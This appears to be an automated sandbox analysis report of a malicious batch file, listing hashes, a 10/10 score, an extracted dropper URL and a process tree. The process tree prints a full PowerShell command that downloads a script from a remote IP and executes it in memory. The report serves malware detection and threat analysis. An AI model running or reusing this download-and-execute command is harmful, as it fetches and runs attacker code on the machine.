Analysis
-
max time kernel
114s -
max time network
110s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
25-03-2020 12:10
Static task
static1
Behavioral task
behavioral1
Sample
Gwbr3aud.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Gwbr3aud.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
Gwbr3aud.bat
-
Size
189B
-
MD5
bedcf382904ffd9d90787b2dd3ad81a2
-
SHA1
56128ffdde214dd351e2f1c0be362a632d065aa7
-
SHA256
051c9112f4294354c647723d8645889eaf36dc198a7e28fbe2f6e229da623a00
-
SHA512
e52d5ce4f80d49034e5429e2c0ebec13e8a9c10b467c3368b1042136f810098cb1ea4d238230c82082025c20c8f54ed69dcbe99df5048d03d95af103100a0a3b
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/Gwbr3aud
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3820 4020 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3820 WerFault.exe Token: SeBackupPrivilege 3820 WerFault.exe Token: SeDebugPrivilege 3820 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Gwbr3aud.bat"1⤵PID:4000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Gwbr3aud');Invoke-BQBBOZ;Start-Sleep -s 10000"2⤵PID:4020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3820